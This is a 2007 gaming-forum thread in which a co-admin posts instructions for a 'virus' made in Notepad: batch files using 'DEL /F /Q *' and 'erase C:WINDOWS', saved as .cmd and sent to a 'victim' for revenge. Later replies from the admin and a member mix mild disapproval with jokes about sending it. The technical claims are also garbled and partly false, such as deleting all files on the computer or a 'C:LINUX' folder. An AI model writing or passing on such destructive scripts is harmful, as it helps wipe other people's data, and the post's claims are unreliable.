GameMastering
Would you like to react to this message? Create an account in a few clicks or log in to continue.

How to make a powerfull virus with only notepad, AMAZING

3 posters

Go down

How to make a powerfull virus with only notepad, AMAZING Empty How to make a powerfull virus with only notepad, AMAZING

Post  dunjanik Mon Oct 22, 2007 10:54 pm

How to make a powerfull virus with only notepad, AMAZING

Neznam bi li smjela ovo staviti, al eto, koga zanima može probati.

!!!YOU DO THIS ON YOUR OWN RESPONSIBILITIES!!!

To delete all folders/files just put this:
DEL /F /Q *
Into notpad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
dunjanik
dunjanik
Co-Admin
Co-Admin

Back to top Go down

How to make a powerfull virus with only notepad, AMAZING Empty Re: How to make a powerfull virus with only notepad, AMAZING

Post  Admin Tue Oct 23, 2007 2:17 pm

For Heavenly Christ sake!!
I will let this topic stay only couple of days, then I will delete it...
This is the real deal, people don't do jokes on this!!
If you HATE some1, again THINK before you create and send it, and think:'What do I get when I crush some1's Windows?'
cheers,
Admin.-------Game Master
Admin
Admin
Admin
Admin

https://gamemastering.forumotion.com

Back to top Go down

How to make a powerfull virus with only notepad, AMAZING Empty Re: How to make a powerfull virus with only notepad, AMAZING

Post  Spongeb0b Tue Oct 23, 2007 6:23 pm

good point there toni, i personly think it's a bit cruel to do to someone (unless u really do hate that person), but nevertheless it does sound cool ^^
Spongeb0b
Spongeb0b

Back to top Go down

Post  Admin Tue Oct 23, 2007 10:46 pm

and a bit scary though, knowing that a reader of this forum may send me an e-mail with that crushing virus, masked in a birthday e-mail greeting...
Admin
Admin
Admin
Admin

Back to top Go down

Post  Spongeb0b Wed Oct 24, 2007 12:25 am

whens ur birthday??? (ill send u virus ^^) oj jocolor
Spongeb0b
Spongeb0b

Back to top Go down

Post  Admin Thu Oct 25, 2007 10:01 pm

Hmm...does it necesserily needs to be at C:WINDOWS; or can it be at D:?
Cuz it's good and all, and it's strange cmd. icon but...it doesn't work...
I mean the thing to delete on file.
Admin
Admin
Admin
Admin

Back to top Go down

Post  dunjanik Thu Oct 25, 2007 11:38 pm

With this you can delete anything you want even some file
only thing that is important that it is written what to delete and that extension is correct
pirat pirat pirat
dunjanik
dunjanik
Co-Admin
Co-Admin

Back to top Go down

Post  Sponsored content

Sponsored content

Back to top Go down

Permissions in this forum:
You cannot reply to topics in this forum